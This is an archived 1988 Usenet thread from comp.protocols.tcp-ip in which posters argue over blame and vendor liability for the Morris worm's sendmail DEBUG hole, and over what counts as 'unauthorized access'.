[comp.protocols.tcp-ip] Worms and fixing blame

lars@ACC-SB-UNIX.ARPA (Lars J Poulsen) (11/10/88)

> In article <2060@spdcc.COM>, eli@spdcc.COM (Steve Elias) writes:
>> "Wormer" Morris has quite a career ahead of him, i'll bet.
>> he has done us all a favor by benevolently bashing bsd 'security'.

> Date: 7 Nov 88 20:06:23 GMT
> From: ember!dre@sun.com  (David Emberson)
> Subject: Re: a holiday gift from Robert "wormer" Morris
> 
> I knew about this sendmail bug at least four years ago, courtesy of Matt
> Bishop (now at Dartmouth).  He wrote a paper detailing at least a half dozen
> holes in the Unix system and methods for constructing trojan horses which was
> so dangerous that he responsibly decided not to publish it, but instead to
> give selected copies to people who could fix some of the problems.
> ...  His behaviour, while unsung by the press and the Usenet community,
> is an example of the highest in professional and academic standards. 
> This is the kind of behaviour that we should be extolling.

I work as a customer service manager at a TCP-IP networking company.
My wife is a corporate MIS person. She asked me about technical aspects of
the worm, and expressed a wish to see severe criminal charges pressed against
the perpetrator. IU asked her on what grounds since there apparently was no
provable malicious intent and no "real damage". rather, I suggested, SUN
Microsystems might be liable for releasing operating systems software with
undocumenated functionality creating a security hole, and companies and/or
government institutions that had chosen to run poorly documented software
available "for free" from a research facility should accept responsibility
for whatever befalls them if they do not review the software that they make
themselves dependent on.

I suggested as a parallel, that no company would be likely to install without
test and review a payroll package found floating around on a computer bulletin
board, and if they did, and the IRS sued they for improper calculation of
withholdings, they would have only themselves to blame. I think she agreed.

The DEBUG code apparently was intended for use internally in the sendmail
development group, and should have been turned off at product release.
It is sortof understandable that a university would not have a clear idea
about quality control, and not have an independent review before release.
It is much less acceptable that the same seems to have been the case
at SUN. As far as I can ascertain, the ULTRIX engineering group was aware of
the problem, and the Ultrix systems, on which I have looked, all seem to
contain a sendmail compiled without DEBUG.

If the claim mentioned above (that UCB's CSRG (sp?) was explicitly made
aware of this problem several years ago) is true, it seems to me that a
claim could be made that UCB was negligent in not instituting procedures
to address this problem. David Emberson lauds Mr Bishop for being a
responsible person who brought the problem to the attention of the people
who were in a position to correct it, rather than creating a media event;
but look how effective that was ????

As a minumum, everybody who buys system software should add the following
clause to their purchase orders: "The system shall identify each user by
a unique user identification, and password validation shall be used to
ensure that no unauthorized access occurs". This will ensure that you can
hold the vendor liable for losses you might incur in a situation like this.

UCB, of course would likely refuse to accept this responsibility, thus
making the problem with non-commercial software explicit.

/ Lars Poulsen
  Advanced Computer Communications
 (Employer name for identification only; my employer knows I have opinions
  but disclaims responsibility)

bzs@pinocchio.UUCP (Barry Shein) (11/18/88)

From: lars@ACC-SB-UNIX.ARPA (Lars J Poulsen)
>As a minumum, everybody who buys system software should add the following
>clause to their purchase orders: "The system shall identify each user by
>a unique user identification, and password validation shall be used to
>ensure that no unauthorized access occurs". This will ensure that you can
>hold the vendor liable for losses you might incur in a situation like this.

Does this make sense? Does sending mail without a password constitute
"unauthorized access"? How about being able to transfer a file to a
publicly writeable scratch area? How about if it fills that scratch
area and cripples the system, or fills a mail spool causing mail to be
lost? How about being able to finger someone? What if someone merely
ties up networking bandwidth soas to cause you major nuisance? What if
they merely dial-up your system with N modems and tie up every
available dial-up you have? Are all those the vendor's fault? What if
they eavesdrop on your packets going across an ethernet? etc etc.

What exactly is "unauthorized access"? Whatever inconveniences you as
an afterthought?

I don't believe that this past problem would have been an issue under
your proposal, the system certainly demands a password for login
access. You're too vague, the bug exploited was that a particular mail
message text could allow an "undesired" program to run (as opposed to
many, permitted and necessary, "desired" programs regularly run on
behalf of mail messages.)

The problem is that user's security needs are widely varied. Oh, I
agree that this past worm entry was an obvious botch, but let's talk
in more general terms, at some point we all agree an error occurred
but the important thing is to agree on intent.

It's easy to say something like "reasonable security" in a contract or
some other such mom and apple pie truism, but what does it mean?  How
can we determine if the contract has been breached?

What are needed are reasonably detailed security requirements (the
military certainly has these although I doubt they would correspond to
most users.) A test suite would be very helpful which would reflect
these needs.

But that would require real work, and cost real money...

Let's face it, one person's security requirement is another's damned
nuisance.

	-Barry Shein, ||Encore||

johnm@vaxc.cc.monash.edu.au (John Mann) (11/22/88)

In article <8811100539.AA27545@ACC-SB-UNIX.ARPA>, lars@ACC-SB-UNIX.ARPA 
(Lars J Poulsen) writes:
> As a minumum, everybody who buys system software should add the following
> clause to their purchase orders: "The system shall identify each user by
> a unique user identification, and password validation shall be used to
> ensure that no unauthorized access occurs". This will ensure that you can
> hold the vendor liable for losses you might incur in a situation like this.

Does this mean that everyone who wants to send mail to your machine has
to have their own usercode and password on that machine?

I guess this also means that the vendor has to disble the ".rhosts" facility
to prevent users from being able to open up their own security.
Are you going to disable other TCP/IP services like finger?  ARP?

I am not trying to put you down, just raise the question of what you really
mean by "authorized" and "access".  Does running a TCP/IP server of any
type automatically "authorize" everyone to "access" your system.  Does putting
your machine on Ethernet/modem connection "authorize" other people to send
packets to it/dial you phone number.

I presume someone will say that by "access", it really means people 
"Logging on" where they shouldn't.  But the worm didn't involve a person 
"Logging on" where they shouldn't.  

Didn't the worm invoke Telnet where it had guessed the password?  If it had
a valid username and password, it is by definition "authorized" isn't it?

> UCB, of course would likely refuse to accept this responsibility, thus
> making the problem with non-commercial software explicit.

I guess they could say that straight off the tape the netwoking doesn't work
(not configured etc.), and you don't *have* to turn the networking on. :-)

	John
--
John Mann, Systems Programmer, Computer Centre, Monash Uni. VIC 3168, Australia
Internet: JohnM@Vaxc.CC.Monash.Edu.Au   Phone: +61 3 565 4774